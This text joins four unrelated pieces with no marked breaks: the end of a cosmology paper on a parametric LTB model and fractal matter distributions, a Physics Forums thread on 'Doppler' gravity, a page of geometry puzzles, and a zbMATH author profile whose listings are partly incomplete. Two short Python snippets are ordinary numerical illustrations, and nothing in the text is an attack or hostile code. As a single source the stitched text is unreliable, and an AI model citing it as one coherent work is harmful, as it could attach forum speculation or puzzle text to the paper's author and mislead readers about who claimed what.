The shape of SNe Ia light curves is empirically well understood, but their absolute magnitude is unknown and needs to be calibrated. One needs either to analytically marginalize over the assumed Hubble rate (or, equivalently, the absolute magnitude of the supernovae) [25] (see Appendix C.2 of Ref. [26]), or to use a weight-matrix formalism (cf. Ref. [27]). Moreover, several authors have pointed out that supernova samples reduced with the SALT-II light-curve fitter of Ref. [28] are systematically biased toward the standard cosmological model and show a tendency to disfavor alternative cosmologies [29–31]. This might be a reason why the parametric LTB model fit has a larger $\chi^2$.
A connection to fractal cosmologies
In this section, we first review the use of fractals and explain how our model could be related to a fractal matter distribution. The idea of fractals relies on spatial power-law scaling, self-similarity and structural recursiveness [32]. These features are present in the formula: $$N(r) \sim r^d,$$ where $d$ is the fractal dimension, $r$ the scale measure and $N(r)$ the distribution which manifests a fractal behavior. If $d$ is an integer, it can be associated with the usual distributions (point-like for $d=0$, a line for $d=1$, and so on). The further $d$ is from the spatial dimension, the more the fractal structure is "broken" or irregular. Note that topological arguments require the fractal dimension to be smaller than the spatial dimension in which the fractal is embedded. These features of irregularity were useful to describe various structures, from the shapes of coastlines to the structure of clouds. In the context of cosmology, a fractal distribution would simply describe how clumpy and inhomogeneous our Universe is. Historically, this idea was popular in the late 80's [33–35]; then some more modern models were developed [36–38], and the relation to cosmological observations was also worked out (see Refs. [39–41] and references therein for an analysis with galaxy distributions).
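The defining relation $N(r)\sim r^d$ means the fractal dimension is simply the slope of $\log N$ against $\log r$. A toy estimate on synthetic counts (assumed values, no real survey data):

```python
import numpy as np

# Synthetic counts obeying N(r) = sigma * r**d exactly (assumed toy values;
# no real survey data is used here).
sigma_true, d_true = 2.0, 1.7
r = np.logspace(-1, 2, 50)
N = sigma_true * r ** d_true

# The fractal dimension is the slope of log N(r) versus log r.
d_est, log_sigma_est = np.polyfit(np.log(r), np.log(N), 1)
print(d_est, np.exp(log_sigma_est))
```

On real galaxy counts the log-log relation only holds over a finite range of scales, and the slope is fitted within that range.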
Using LTB models together with a fractal matter distribution has already been considered in Refs. [42–47]. In Ref. [22], following Ref. [33], the authors proposed a fractal-inspired model by taking the luminosity distance as the spatial separation of the fractal ($N(r)=\sigma (d_L)^d$). This is motivated by the view of the fractal structure as an observational feature of the galaxy distribution. Since astronomical observations are carried out on the past null cone, the underlying structure of galaxies may not itself be fractal [42,43]. The model proposed by Ref. [22] (and references therein) is interesting, but a clear problem appears: if one uses the self-similarity condition for the LTB model (Eq. (3.17)), it is clear that at $z=0$ the mass function is not zero, which is unsatisfactory (cf. also Fig. 3.5). In the same way, it can be shown that within the framework of Ref. [22] the luminosity distance is nonzero at $z=0$; again, this shows that this model cannot describe our Universe at low redshift.
The model we considered in the previous sections is such that $N(r)=\sigma r^d$ and could correspond to a fractal matter distribution if $0<d<3$, from topological considerations. The fractal is described by the coordinate $r$; that is, the fractal structure is a geometrical effect which does not necessarily translate itself into an astronomically observable quantity. Given the best fit of $d=3.44$, and within our working hypotheses, we can state that SNe Ia data do not support fractal models.
Conclusion and Perspectives
A parametric LTB model has been introduced in this work. It is characterized by two parameters ($\sigma$, $d$), like the flat FLRW model ($H_0$, $\Omega_M$). The link to SNe Ia data was then worked out, leading to a comparison between the flat FLRW model and the parametric LTB model. The parametric LTB model can fit the data reasonably, but the standard FLRW model fits the data better. To keep testing such models, it is desirable to improve the data analysis with more elaborate techniques for SNe Ia, but also with other data sets, e.g. CMB anisotropies and polarization, the integrated Sachs-Wolfe effect, light-element abundances, baryon acoustic oscillations, and galaxy surveys. One of the motivations to build such a model was to provide a physical input to constrain the general LTB metric, whose two free functions allow it to fit any cosmological data under mild assumptions on these functions [12]. The parametric LTB model of this paper can be generalized to cases where $t_B(r)$ is not constant, or (but not and, because of the gauge freedom of the free functions of the LTB metric) to non-uniformly flat geometries. It has been shown, for instance, in Ref. [48] that a nonsimultaneous big bang can also account for the acceleration of the expansion of the Universe.
Since FLRW models are nowadays the most popular ones, many of their caveats are known and investigated with special care (cf. Sec. 2). Even though the LTB metric is less popular, some problems have also been identified and investigated. To account for the remarkable uniformity of the CMB observations, our location in the Universe has to be fine-tuned at (or close, to within 1%, to) the symmetry center of the LTB model [26], clearly violating the Copernican principle. Whether this fine-tuning is problematic is still debated nowadays [11,49]: for instance, the FLRW model is also non-Copernican from a fully relativistic point of view. Another direction would be not to take LTB models too literally [11,13]. As with FLRW, LTB models should be considered as an approximation of reality. In some average sense, it could be that an inhomogeneous metric captures the real world better than a perfectly symmetric one [50]. Other exact non-spherically-symmetric solutions exist, like the Szekeres model [51,52], examples patching together FLRW and LTB metrics in a kind of Swiss-cheese model [53], patchings of Kasner and FLRW models [19], and meatball models [54]. Thus, those models should not be taken as a way to describe our reality exactly but as attempts to investigate inhomogeneous metrics and see how much of our reality they grasp. Most of those extensions are in agreement with the Copernican principle.
When it comes to discussing structure formation in the FLRW model, one still assumes spatial homogeneity and isotropy but treats the forming structures as metric and matter perturbations. Performing perturbation theory in an LTB metric is a really complex task, especially because a scalar-vector-tensor decomposition no longer allows one to study the scalar, vector and tensor modes separately. Instead, the "natural" variables in which to perform the perturbation theory give, in the FLRW limit, a cumbersome combination of scalars, vectors and tensors. Efforts have been made in this direction [55,56], but the perturbation techniques are not yet advanced enough to be confronted with realistic numerical simulations and observations, as the FLRW model is. In addition, observations indicate the Universe to be very flat, which creates a fine-tuning problem christened the flatness problem. The solution for the FLRW universe was a period of inflation. If one aims at describing the early Universe with an LTB model, the same flatness problem might appear. However, inflation would then occur differently at separate spatial locations. This is a bizarre feature whose consequences one can only speculate about. It might be one different way to reach the multiverse scenario [57]. With a loss of generality for the free functions, it is always possible to demand that the LTB model approach the homogeneous limit at early times, in which case the inflationary FLRW results apply [58].
To finish, all the models involving inhomogeneities do not solve the cosmological constant problem [21] but just shift it: instead of explaining a fairly unnatural value for it, one simply assumes it is zero without providing any explanation. This is in complete disagreement with Lovelock's theorem, which states that the cosmological constant appears naturally in any metric theory of gravity [59,60]. All models of dynamical dark energy suffer from the same criticism.
Acknowledgments
The author expresses his gratitude to Vera Podskalsky for hosting him during the crucial part of this work. Disha Sawant, Gregory Vereshchagin and Remo Ruffini are also acknowledged for discussions. CS is supported by the Erasmus Mundus Joint Doctorate Program by Grant Number 2013-1471 from the EACEA of the European Commission.
References
1. P. A. R. Ade et al. [Planck Collaboration], Astron. Astrophys. 571 (2014) A16 [arXiv:1303.5076 [astro-ph.CO]].
2. R. Maartens, Phil. Trans. Roy. Soc. Lond. A 369 (2011) 5115 [arXiv:1104.1300 [astro-ph.CO]].
3. C. Clarkson, Comptes Rendus Physique 13 (2012) 682 [arXiv:1204.5505 [astro-ph.CO]].
4. G. F. R. Ellis, astro-ph/0602280.
5. G. Lemaitre, Annales Soc. Sci. Brux. Ser. I Sci. Math. Astron. Phys. A47, 49 (1927).
6. R. C. Tolman, Proc. Nat. Acad. Sci. 20, 169 (1934).
7. H. Bondi, Mon. Not. Roy. Astron. Soc. 107, 410 (1947).
8. M. N. Celerier, Astron. Astrophys. 353 (2000) 63 [astro-ph/9907206].
9. H. Iguchi, T. Nakamura and K. i. Nakao, Prog. Theor. Phys. 108 (2002) 809 [astro-ph/0112419].
10. S. Nadathur and S. Sarkar, Phys. Rev. D 83 (2011) 063506.
11. M. N. Celerier, Astron. Astrophys. 543 (2012) A71 [arXiv:1108.1373 [astro-ph.CO]].
12. N. Mustapha, C. Hellaby and G. F. R. Ellis, Mon. Not. Roy. Astron. Soc. 292 (1997) 817 [gr-qc/9808079].
13. M. N. Celerier, K. Bolejko and A. Krasinski, Astron. Astrophys. 518 (2010) A21 [arXiv:0906.0905 [astro-ph.CO]].
14. N. Suzuki et al., Astrophys. J. 746 (2012) 85 [arXiv:1105.3470 [astro-ph.CO]].
15. L. G. Balazs, Z. Bagoly, J. E. Hakkila, I. Horvath, J. Kobori, I. Racz and L. V. Toth, arXiv:1507.00675 [astro-ph.CO].
16. M. F. Shirokov and I. Z. Fisher, Soviet Ast. 6, 699 (1963).
17. T. Buchert, Gen. Rel. Grav. 32 (2000) 105 [gr-qc/9906015].
18. R. Zalaletdinov, Int. J. Mod. Phys. A 23 (2008) 1173 [arXiv:0801.3256 [gr-qc]].
19. P. Fleury, H. Dupuy and J. P. Uzan, Phys. Rev. D 87 (2013) 12, 123526 [arXiv:1302.5308 [astro-ph.CO]].
20. E. W. Kolb and M. S. Turner, The Early Universe, Frontiers in Physics 69 (Addison-Wesley, 1990).
21. J. Martin, Comptes Rendus Physique 13 (2012) 566 [arXiv:1205.3365 [astro-ph.CO]].
22. F. A. M. G. Nogueira, arXiv:1312.5005 [gr-qc].
23. G. Ellis, Gen. Rel. Grav. 41, 581 (1971).
24. I. M. H. Etherington, Phil. Mag. 15, 761 (1933).
25. S. L. Bridle, R. Crittenden, A. Melchiorri, M. P. Hobson, R. Kneissl and A. N. Lasenby, Mon. Not. Roy. Astron. Soc. 335 (2002) 1193 [astro-ph/0112114].
26. T. Biswas, A. Notari and W. Valkenburg, JCAP 1011 (2010) 030 [arXiv:1007.3065 [astro-ph.CO]].
27. R. Amanullah et al., Astrophys. J. 716 (2010) 712 [arXiv:1004.1711 [astro-ph.CO]].
28. J. Guy et al. [SNLS Collaboration], Astron. Astrophys. 466 (2007) 11 [astro-ph/0701828 [ASTRO-PH]].
29. M. Hicken, W. M. Wood-Vasey, S. Blondin, P. Challis, S. Jha, P. L. Kelly, A. Rest and R. P. Kirshner, Astrophys. J. 700 (2009) 1097 [arXiv:0901.4804 [astro-ph.CO]].
30. R. Kessler et al., Astrophys. J. Suppl. 185 (2009) 32 [arXiv:0908.4274 [astro-ph.CO]].
31. P. R. Smale and D. L. Wiltshire, Mon. Not. Roy. Astron. Soc. 413 (2011) 367 [arXiv:1009.5855 [astro-ph.CO]].
32. B. B. Mandelbrot, The Fractal Geometry of Nature (1982).
33. L. Pietronero, Physica A 144 (1987).
34. P. H. Coleman and L. Pietronero, Phys. Rept. 213, 311 (1992).
35. R. Ruffini, D. Song, and S. Taraglio, Astron. Astrophys. 190 (1988).
36. J. R. Mureika, JCAP 0705, 021 (2007), gr-qc/0609001.
37. Y. V. Baryshev, 'Practical Cosmology', v.2, pp.60-67, 2008 [arXiv:0810.0162 [gr-qc]].
38. P. V. Grujic and V. D. Pankovic, arXiv:0907.2127 [physics.gen-ph].
39. C. A. Chacon-Cardona and R. A. Casas-Miranda, Mon. Not. Roy. Astron. Soc. 427 (2012) 2613 [arXiv:1209.2637 [astro-ph.CO]].
40. G. Conde-Saavedra, A. Iribarrem and M. B. Ribeiro, Physica A 417 (2015) 332 [arXiv:1409.5409 [astro-ph.CO]].
41. J. S. Bagla, J. Yadav and T. R. Seshadri, Mon. Not. Roy. Astron. Soc. 390 (2007) 829 [arXiv:0712.2905 [astro-ph]].
42. M. B. Ribeiro, Astrophys. J. 388 (1992) 1 [arXiv:0807.0866 [astro-ph]].
43. M. B. Ribeiro, Astrophys. J. 395 (1992) 29 [arXiv:0807.0869 [astro-ph]].
44. M. B. Ribeiro, Astrophys. J. 415 (1993) 469 [arXiv:0807.1021 [astro-ph]].
45. F. Sylos Labini, M. Montuori and L. Pietronero, Phys. Rept. 293 (1998) 61 [astro-ph/9711073].
46. F. S. Labini, Europhys. Lett. 96 (2011) 59001 [arXiv:1110.4041 [astro-ph.CO]].
47. F. S. Labini, Class. Quant. Grav. 28 (2011) 164003 [arXiv:1103.5974 [astro-ph.CO]].
48. A. Krasiński, Phys. Rev. D 89, 023520 (2014).
49. P. Sundell and I. Vilja, Mod. Phys. Lett. A 29 (2014) 10, 1450053 [arXiv:1311.7290 [astro-ph.CO]].
50. K. Bolejko and R. A. Sussman, Phys. Lett. B 697 (2011) 265 [arXiv:1008.3420 [astro-ph.CO]].
51. P. Szekeres, Commun. Math. Phys. 41 (1975) 55.
52. K. Bolejko and M. N. Celerier, Phys. Rev. D 82 (2010) 103510 [arXiv:1005.2584 [astro-ph.CO]].
53. T. Biswas and A. Notari, JCAP 0806 (2008) 021 [astro-ph/0702555].
54. K. Kainulainen and V. Marra, Phys. Rev. D 80 (2009) 127301 [arXiv:0906.3871 [astro-ph.CO]].
55. C. Clarkson, T. Clifton and S. February, JCAP 0906 (2009) 025 [arXiv:0903.5040 [astro-ph.CO]].
56. A. Leithes and K. A. Malik, Class. Quant. Grav. 32 (2015) 1, 015010 [arXiv:1403.7661 [astro-ph.CO]].
57. B. Carr, ed., Universe or Multiverse? (Cambridge University Press, 2007), ISBN 9781107050990.
58. R. de Putter, L. Verde and R. Jimenez, JCAP 1302 (2013) 047 [arXiv:1208.4534 [astro-ph.CO]].
59. D. Lovelock, J. Math. Phys. 12, 498 (1971).
60. D. Lovelock, J. Math. Phys. 13, 874 (1972).
Footnotes
1. clement.stahl@icranet.org
"Doppler" Gravity
Homework Helper
Main Question or Discussion Point
When a force follows the inverse square law, its effects are stronger as the source approaches than when it recedes.
So light will blue shift (higher energy) and sound is louder and at a higher pitch.
So I would think that gravity would be stronger from an approaching object than from a receding one.
This effect would be important for objects travelling at relativistic velocities and would be in addition to the relativistic increase in mass.
But I haven't seen this mentioned in any articles.
Does this effect exist? If not, why not?
Nugatory
Mentor
Does this effect exist? If not, why not?
Doppler has nothing to do with whether a phenomenon is governed by an inverse square law or not. Machine gun bullets aren't subject to any inverse square law (in vacuum their momentum and kinetic energy are constant throughout their flight) but they do demonstrate the Doppler effect: if you are flying head-on towards the gun you will be hit by more bullets per unit time than if you are flying away from it.
Homework Helper
OK. But my question is whether gravity is more intense from an approaching object than from a receding one.
I put "Doppler" in quotes because Doppler is specific to a frequency shift. In this case, there is no oscillation involved - but there should still be an increase or decrease in intensity.
Actually, the machine gun example further suggests that this effect would apply broadly - perhaps including to gravity.
PeterDonis
Mentor
So I would think that gravity would be stronger from an approaching object that from a receding one.
Why? Gravity is not EM radiation.
Also, what do you mean by "gravity would be stronger"? I strongly suggest looking at the math rather than trying to use intuition.
PeterDonis
Mentor
This effect would be important for objects travelling at relativistic velocities and would be in addition to the relativistic increase in mass.
The source of gravity is not relativistic mass. It's the stress-energy tensor.
Grinkle
Gold Member
I would think that gravity would be stronger from an approaching object that from a receding one.
Waves from an approaching source are not higher in amplitude, they are shifted in frequency.
Gravity waves (which is not what you are talking about, I don't think) don't appear, as far as I know, just because a massive object is moving through spacetime; they need something exotic like a massive orbiting dipole. If such a dipole were approaching a gravity wave detector, I think the waves might have a shifted frequency but not an increased or decreased amplitude vs waves that would be generated from a dipole not moving with respect to the detector. I am very unqualified to make that statement - it's just supposition on my part.
A massive object moving towards a gravity wave detector won't generate any gravity waves. You aren't talking about gravity waves per se, but your question did make me think some about that aspect.
PAllen
Gravity waves (which is not what you are talking about, I don't think) don't appear, as far as I know, just because a massive object is moving through spacetime; they need something exotic like a massive orbiting dipole. If such a dipole were approaching a gravity wave detector, I think the waves might have a shifted frequency but not an increased or decreased amplitude vs waves that would be generated from a dipole not moving with respect to the detector.
Actually, for gravitational waves, dipole oscillation is not enough. You need nonzero second derivative of the quadrupole moment.
Homework Helper
Okay, here's some math:
We start with an observer at location 0 and a massive object (A) travelling along the line from $-\infty$ to $+\infty$ at $c/2$.
I will assume (please indicate your agreement or objection) that the total change in momentum applied to the observer from the gravitational force of A will be the same as A moves from -4 Km to -3 ($p_{(-4,-3)}$) as when it moves from 3 Km to 4 ($p_{(3,4)}$).
However, from the observer's perspective:
- A reaches -4Km, -3, 3, and 4 at times -8Km/c, -6Km/c, 6Km/c and 8Km/c respectively.
- Gravity from A at -4Km, -3, 3, and 4 reaches the observer at -4Km/c, -3Km/c, 9Km/c and 12Km/c respectively.
So the momentum imparted to the observer from $p_{(-4,-3)}$ occurs over time 1Km/c while that from $p_{(3,4)}$ occurs over 3Km/c.
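The arrival times listed above can be checked with a few lines, working in units of km and km/c with c = 1 and with the mass crossing the origin at t = 0, as in the setup:

```python
c = 1.0  # units: distances in km, times in km/c

def arrival_time(x, v=0.5):
    """Time at which the gravitational influence emitted as the mass passes
    position x (moving at v = c/2 and crossing x = 0 at t = 0) reaches the
    observer sitting at the origin."""
    t_emit = x / (v * c)            # the mass is at position x at this time
    return t_emit + abs(x) / c      # plus the light-travel time to x = 0

for x in (-4.0, -3.0, 3.0, 4.0):
    print(x, arrival_time(x))

# Approaching leg (-4 -> -3): arrivals span -4 to -3, i.e. 1 km/c.
# Receding leg   ( 3 ->  4): arrivals span  9 to 12, i.e. 3 km/c.
```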
If my assumption is not correct, then consider the following scenario:
- observers are at -6Km and 6.
- object A materializes at -1Km, travels at $c/2$ and vanishes at +1
- would both observers have the same change in momentum?
Homework Helper
The source of gravity is not relativistic mass. It's the stress-energy tensor.
OK. I will look that up.
Grinkle
Gold Member
We start with an observer at location 0 and a massive object (A) travelling along the line from $-\infty$ to $+\infty$ at $c/2$.
I think this is saying that your observer is falling into the gravity well of the massive object.
- observers are at -6Km and 6.
- object A materializes at -1Km, travels at $c/2$ and vanishes at +1
- would both observers have the same change in momentum?
I may be missing your point, but when I think about this it just seems like objects moving into or out of gravity wells, not gravity being stronger or weaker?
jbriggs444
Homework Helper
- object A materializes at -1Km, travels at $c/2$ and vanishes at +1
Cannot be done. Local energy conservation is a property of general relativity. You cannot materialize or dematerialize objects.
Homework Helper
I think this is saying that your observer is falling into the gravity well of the massive object.
I may be missing your point, but when I think about this it just seems like objects moving into or out of gravity wells, not gravity being stronger or weaker?
My point is that the effect of gravity (the observer's change in momentum) differs depending on whether the massive object is approaching or receding. The difference is either:
- the total change in momentum;
- the rate of change (G force); or
- both
Homework Helper
Cannot be done. Local energy conservation is a property of general relativity. You cannot materialize or dematerialize objects.
That is certainly true. But I can slice up time/space into time-like pieces and consider the changes that occur in each slice.
jbriggs444
Homework Helper
That is certainly true. But I can slice up time/space into time-like pieces and consider the changes that occur in each slice.
No, you cannot. Because once you've sliced off a chunk of time there can be no change because there is no elapsed time. In any case, that does not let you materialize or dematerialize objects.
Homework Helper
No, you cannot. Because once you've sliced off a chunk of time there can be no change because there is no elapsed time. In any case, that does not let you materialize or dematerialize objects.
The slice is not zero seconds in length. It is simply from one moment to another moment a few Km/c later.
If you don't like materializing and dematerializing objects, just use those moments at the start and end of the data collection period.
jbriggs444
Homework Helper
The slice is not zero seconds in length. It is simply from one moment to another moment a few Km/c later.
If you don't like materializing and dematerializing objects, just use those moments at the start and end of the data collection period.
So now that we have permanently gravitating objects, what is the scenario that you are testing?
Nugatory
Mentor
We start with an observer at location 0 and a massive object (A) travelling along the line from $-\infty$ to $+\infty$ at $c/2$.
I will assume (please indicate your agreement or objection) that the total change in momentum applied to the observer from the gravitational force of A will be the same as A moves from -4 Km to -3 ($p_{(-4,-3)}$) as when it moves from 3 Km to 4 ($p_{(3,4)}$).
However, from the observer's perspective:
- A reaches -4Km, -3, 3, and 4 at times -8Km/c, -6Km/c, 6Km/c and 8Km/c respectively.
- Gravity from A at -4Km, -3, 3, and 4 reaches the observer at -4Km/c, -3Km/c, 9Km/c and 12Km/c respectively.
So the momentum imparted to the observer from $p_{(-4,-3)}$ occurs over time 1Km/c while that from $p_{(3,4)}$ occurs over 3Km/c.
I'm not sure what you mean by "gravity from A .... reaching the observer". Nothing is moving from the gravitational source to the observer, so there's nothing to reach anywhere. However, there's a deeper problem here: How exactly are you defining these points that you're labeling -4km, -3km, 3km, 4km and those times you're labeling -4km/c, -3km/c, 3km/c, 4km/c? Those are coordinates. How are they related to points in spacetime? And how are you comparing the coordinate-dependent three-momenta of the observer at the start and end of the two paths? The distances between 3km and 4km and between -3km and -4km are not 1km, they are "it depends", and not necessarily the same.
I expect that you are implicitly assuming a global inertial frame in which A starts at rest at (0,0), because only then do the answers to these questions appear obvious, and only then would it seem that there is a natural way that any sensible person committed to answering your question instead of quibbling would interpret your description of the thought experiment. Unfortunately, in this thought experiment there can be no such frame - global inertial frames exist only in the absence of gravitational effects, and this problem is specifically about gravitational effects.
To reason about this situation properly, you could either try looking at the Aichelburg-Sexl ultraboost (basically, the Schwarzschild spacetime described using coordinates in which the gravitating body is moving at relativistic speeds), or work with the equivalent situation: the gravitating body is at rest so you can use Schwarzschild or other more common coordinates, and the observer is approaching it with a non-zero coordinate velocity. The latter approach is better for building an intuitive picture of what's going on, and going through it will demonstrate just how tricky it is to describe the setup accurately.
You should end up with a gravitational slingshot effect like what we see in Newtonian physics when a spacecraft passes by a planet (and identical in the non-relativistic limit).
I withdraw this last sentence. There is a very large can of worms hiding behind it, and getting right would be a huge digression in this thread.
Homework Helper
So now that we have permanently gravitating objects, what is the scenario that you are testing?
There were a total of three scenarios, four if you count scenario/observer combinations. I described them all above.
In all cases, the mass is moving over an interval directly towards or away from an observer - at a relative speed of c/2.
The results are changes in the momentum of the observers. But the period of time over which the observers are affected differs depending on whether the mass is approaching or receding. So either the total momentum is different in those cases or the rate of momentum change is different. I am still not sure which.
Nugatory
Mentor
So either the total momentum is different in those cases or the rate of momentum change is different. I am still not sure which.
Either or both. The three-momentum and its rate of change are both coordinate-dependent, so which it is depends on your choice of coordinates.
Homework Helper
I'm not sure what you mean by "gravity from A .... reaching the observer".
This is the ol' "If the sun disappeared now, how long would it take for the Earth to leave orbit?".
Presumably, the effect of any such change would take 8 minutes to reach us.
Nothing is moving from the gravitational source to the observer, so there's nothing to reach anywhere.
Would it help if I postulated a mass of photons colliding with another mass and interacting to form object A with the specified velocity and position? Then decaying into two masses of photons at the end position?
However, there's a deeper problem here: How exactly are you defining these points that you're labeling -4km, -3km, 3km, 4km and those times you're labeling -4km/c, -3km/c, 3km/c, 4km/c? Those are coordinates. How are they related to points in spacetime?
There is only one space dimension in these scenarios. Nothing happens in the other two spatial dimensions (except for those masses of photons I just introduced in this post). So the observer is at the 0Km position and all times are observer times.
And how are you comparing the coordinate-dependent three-momenta of the observer at the start and end of the two paths? The distances between 3km and 4km and between -3km and -4km are not 1km, they are "it depends", and not necessarily the same.
Everything is in the observer's frame. So the question I have about the differences is from the observer's frame.
I expect that you are implicitly assuming a global inertial frame in which A starts at rest at (0,0), because only then do the answers to these questions appear obvious, and only then would it seem that there is a natural way that any sensible person committed to answering your question instead of quibbling would interpret your description of the thought experiment. Unfortunately, in this thought experiment there can be no such frame - global inertial frames exist only in the absence of gravitational effects, and this problem is specifically about gravitational effects.
OK. But my question should still be addressable in terms of what the net effect would be.
To reason about this situation properly, you could either try looking at the Aichelburg-Sexl ultraboost (basically, the Schwarzschild spacetime described using coordinates in which the gravitating body is moving at relativistic speeds), or work with the equivalent situation: the gravitating body is at rest so you can use Schwarzschild or other more common coordinates, and the observer is approaching it with a non-zero coordinate velocity. The latter approach is better for building an intuitive picture of what's going on, and going through it will demonstrate just how tricky it is to describe the setup accurately.
I will add that, along with "tensors", to my homework list. So far, I haven't run into any "meat" in my gravitational tensor reading.
PeterDonis
Mentor
This is the ol' "If the sun disappear now, how long would it take for the Earth to leave orbit?".
Which, as has already been pointed out, is impossible because objects like the sun can't disappear; stress-energy is locally conserved.
It turns out to be highly non-trivial to formulate a consistent scenario to test "the speed of gravity". For an introduction to some of the issues involved, I suggest this classic paper by Carlip:
https://arxiv.org/abs/gr-qc/9909087
jbriggs444
Homework Helper
This is the ol' "If the sun disappear now, how long would it take for the Earth to leave orbit?".
Again, that is not a valid question. The sun cannot disappear.
Homework Helper
Either or both. The three-momentum and its rate of change are both coordinate-dependent, so which it is depends on your choice of coordinates.
OK...
Let me present a somewhat more complicated thought experiment - but one that is easier to describe, although probably much more complicated to address the reasoning:
Let's have a flat universe with many stationary (in their frame) gravitational sources (perhaps galaxies) evenly dispersed.
Now we will introduce another galaxy travelling through this universe at c/2.
Taking this galaxy as our frame, will this galaxy accelerate? If it does, it would be because there is a kind of "Doppler" effect (for lack of a better term) related to gravity's propagation rate. If it does not, then gravity is doing something that I don't understand. Somehow it isn't really propagating at the speed of light - because our moving galaxy isn't "running into" this propagation and causing it to "bunch up".
Nugatory
Mentor
Everything is in the observer's frame. So the question I have about the differences is from the observer's frame.
Well, that makes the problem easy.... The observer's momentum using that frame (which is not global) is initially zero and never changes.
But I expect that what you really meant was "a global inertial frame in which the observer is initially at rest", and there is no such thing. There is a local inertial frame in which the observer is initially at rest, but because it is local it cannot be used to assign times and positions to more distant points.
I will add that to "Tensors" to my homework list. So far, I haven't run into any "meat" in my Gravitational Tensor reading.
The first step (you'll find this towards the start of just about every GR textbook) is to see how ordinary flat-space special relativity works when written in tensor form. This allows you to clearly separate the coordinate artifacts from the actual coordinate-independent physics, the stuff that we can measure and observe.
Homework Helper
Well, that makes the problem easy.... The observer's momentum using that frame (which is not global) is initially zero and never changes.
But I expect that what you really meant was "a global inertial frame in which the observer is initially at rest", and there is no such thing.
I didn't consider that problem. You're right. I was trying to use a more global frame. But I think the problem with such a global frame is small when compared to the 3:1 ratio in the exposure rate to the receding and approaching masses. |
mscroggs.co.uk
Puzzles
Is it equilateral?
In the diagram below, $$ABDC$$ is a square. Angles $$ACE$$ and $$BDE$$ are both 75°.
Is triangle $$ABE$$ equilateral? Why/why not?
17 December
The number of degrees in one internal angle of a regular polygon with 360 sides.
Ticking clock
Is there a time of day when the hands of an analogue clock (one with a second hand that moves every second instead of moving continuously) will all be 120° apart?
Tags: angles, time
Dodexagon
In the diagram, B, A, C, D, E, F, G, H, I, J, K and L are the vertices of a regular dodecagon and B, A, M, N, O and P are the vertices of a regular hexagon.
Show that A, M and E lie on a straight line.
Three squares
Source: Numberphile
The diagram shows three squares with diagonals drawn on and three angles labelled.
What is the value of $$\alpha+\beta+\gamma$$?
Documents Indexed: 26 Publications since 1987 · Reviewing Activity: 55 Reviews · Co-Authors: 16 (11 Joint Publications) · Co-Co-Authors: 366
### Co-Authors
15 single-authored 4 Simonenko, Igor’ Borisovich 3 Batalshchikov, A. A. 3 Deundyak, Vladimir Mikhaĭlovich 3 Grudsky, Sergei Mikhailovich 2 Ramírez de Arellano, Enrique 2 Zolotykh, Svetlana Andreevna 1 Abanin, Aleksandr Vasil’evich 1 Karyakin, Mikhail I. 1 Klimentov, Sergeĭ Borisovich 1 Korobeĭnik, Yuriĭ Fëdorovich 1 Kusraev, Anatoly Georgievich 1 Levendorskiĭ, Sergeĭ Zakharovich 1 Malisheva, I. S. 1 Mihalkovich, S. S. 1 Soibelman, Yan S. 1 Vatulyan, Aleksandr Ovanesovich
### Serials
4 Functional Analysis and its Applications 3 Theoretical and Mathematical Physics 3 Vladikavkazskiĭ Matematicheskiĭ Zhurnal 2 Linear Algebra and its Applications 2 Russian Academy of Sciences. Doklady. Mathematics 1 Letters in Mathematical Physics 1 Mathematical Notes 1 Integral Equations and Operator Theory 1 Izvestiya Severo-Kavkazskogo Nauchnogo Tsentra Vyssheĭ Shkoly. Estestvennye Nauki 1 Journal of Mathematical Sciences (New York) 1 Izvestiya: Mathematics 1 Izvestiya Vysshikh Uchebnykh Zavedeniĭ. Severo-Kavkazskiĭ Region. Estestvennye Nauki 1 Fundamental’naya i Prikladnaya Matematika 1 Lobachevskii Journal of Mathematics 1 SIGMA. Symmetry, Integrability and Geometry: Methods and Applications
### Fields
15 Nonassociative rings and algebras (17-XX) 7 Operator theory (47-XX) 5 Linear and multilinear algebra; matrix theory (15-XX) 3 Approximations and expansions (41-XX) 3 Functional analysis (46-XX) 3 Numerical analysis (65-XX) 3 Quantum theory (81-XX) 2 Associative rings and algebras (16-XX) 2 Integral equations (45-XX) 1 History and biography (01-XX) 1 $$K$$-theory (19-XX) 1 Several complex variables and analytic spaces (32-XX) 1 Algebraic topology (55-XX)
### Citations contained in zbMATH Open
18 Publications have been cited 88 times in 51 Documents Cited by Year
The quantum Weyl group and the universal quantum $$R$$-matrix for affine Lie algebra $$A^{(1)}_ 1$$. Zbl 0776.17011
Levendorskij, Serge; Soibelman, Yan; Stukopin, Vladimir
1993
Yangians of Lie superalgebras of type $$A(m,n)$$. Zbl 0862.17011
Stukopin, V. A.
1994
Asymptotics of eigenvalues of symmetric Toeplitz band matrices. Zbl 1318.47043
Batalshchikov, A. A.; Grudsky, S. M.; Stukopin, V. A.
2015
The Yangian double of the Lie superalgebra $$A(m,n)$$. Zbl 1152.17007
Stukopin, V. A.
2006
Yangian of the strange Lie superalgebra of $$Q_{n-1}$$ type, Drinfel’d approach. Zbl 1234.17013
2007
Representations of the Yangian of a Lie superalgebra of type $$A(m,n)$$. Zbl 1303.17013
Stukopin, V. A.
2013
Twisted Yangians, Drinfeld approach. Zbl 1213.17017
Stukopin, V.
2009
Asymptotics of eigenvectors of large symmetric banded Toeplitz matrices. Zbl 1330.15032
Batalshchikov, A.; Grudsky, S.; Ramírez de Arellano, E.; Stukopin, V.
2015
Representations theory and doubles of Yangians of classical Lie superalgebras. Zbl 1041.17007
2002
The quantum double of the Yangian of the Lie superalgebra $$A(m,n)$$ of the universal $$R$$-matrix. Zbl 1072.17008
Stukopin, V. A.
2005
The Yangian of the strange Lie superalgebra and its quantum double. Zbl 1311.17009
Stukopin, V. A.
2013
Isomorphism of the Yangian $$Y_{\hbar}(A(m, n))$$ of the special linear Lie superalgebra and the quantum loop superalgebra $$U_{\hbar}(LA(m, n))$$. Zbl 1429.17017
Stukopin, V. A.
2019
Yangians of classical Lie superalgebras. Zbl 1122.17011
Stukopin, V.
2004
The index of families of Noether singular and bisingular operators with piecewise continuous coefficients on composite contours. Zbl 0859.45005
Deundyak, V. M.; Simonenko, I. B.; Stukopin, V. A.
1994
Ideals of a Banach algebra of singular integral operators with piecewise continuous coefficients in the space $$L_ p$$ on a composite contour. Zbl 0832.46043
Deundyak, V. M.; Simonenko, I. B.; Stukopin, V. A.
1993
Homotopy classification of families of Noetherian singular operators with piecewise continuous coefficients on a composite contour. Zbl 0814.45006
Deundyak, V. M.; Simonenko, I. B.; Stukopin, V. A.
1993
